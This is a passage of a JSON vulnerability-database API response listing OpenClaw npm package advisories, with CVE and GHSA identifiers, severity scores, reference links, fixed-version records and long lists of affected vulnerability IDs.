                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-improper-authorization-in-node-pair-approve-via-operator-write-scope"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-67mf-f936-ppxf",
                    "reference_id": "GHSA-67mf-f936-ppxf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-67mf-f936-ppxf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42426",
                "GHSA-67mf-f936-ppxf"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "7.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9xgq-vtg2-jucq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90304?format=api",
            "vulnerability_id": "VCID-9xrt-mv81-3yc8",
            "summary": "OpenClaw: Voice-call still parses large WebSocket frames before start validation (Incomplete fix for CVE-2026-32062)\n## Summary\nIncomplete fix for CVE-2026-32062: voice-call still parses large WebSocket frames before start validation\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 still parses oversized pre-start voice-call WebSocket frames before start validation, and the unreleased maxPayload fix confirms the shipped resource-consumption bug remains open.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `9abcfdadf591bf266d85fbdfe14ae833e557a110` — 2026-03-31T19:47:10+09:00\n\nOpenClaw thanks @Kazamayc for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41400",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00164",
                            "scoring_system": "epss",
                            "scoring_elements": "0.37267",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00164",
                            "scoring_system": "epss",
                            "scoring_elements": "0.37242",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00164",
                            "scoring_system": "epss",
                            "scoring_elements": "0.37274",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41400"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/9abcfdadf591bf266d85fbdfe14ae833e557a110",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/9abcfdadf591bf266d85fbdfe14ae833e557a110"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2w79-r9g8-wmcr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2w79-r9g8-wmcr"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41400",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41400"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-oversized-websocket-frames-in-voice-call",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-oversized-websocket-frames-in-voice-call"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2w79-r9g8-wmcr",
                    "reference_id": "GHSA-2w79-r9g8-wmcr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2w79-r9g8-wmcr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41400",
                "GHSA-2w79-r9g8-wmcr"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9xrt-mv81-3yc8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91090?format=api",
            "vulnerability_id": "VCID-9yxw-fj1c-tff9",
            "summary": "OpenClaw: `session_status` sessionId resolution bypasses sandboxed session-tree visibility\n## Summary\n\n`session_status` sessionId resolution bypasses sandboxed session-tree visibility\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `>= 2026.3.11, <= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\n`session_status` previously resolved a `sessionId` to a canonical session key after early visibility checks, letting sandboxed children reach parent or sibling sessions that were blocked by explicit `sessionKey`. Commit `d9810811b6c3c9266d7580f00574e5e02f7663de` enforces visibility after `sessionId` resolution so sandboxed callers cannot escape their session tree.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d9810811b6c3c9266d7580f00574e5e02f7663de`.\n\n## Fix Commit(s)\n\n- `d9810811b6c3c9266d7580f00574e5e02f7663de`",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d9810811b6c3c9266d7580f00574e5e02f7663de",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d9810811b6c3c9266d7580f00574e5e02f7663de"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q2qc-744p-66r2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q2qc-744p-66r2"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-q2qc-744p-66r2",
                    "reference_id": "GHSA-q2qc-744p-66r2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-q2qc-744p-66r2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
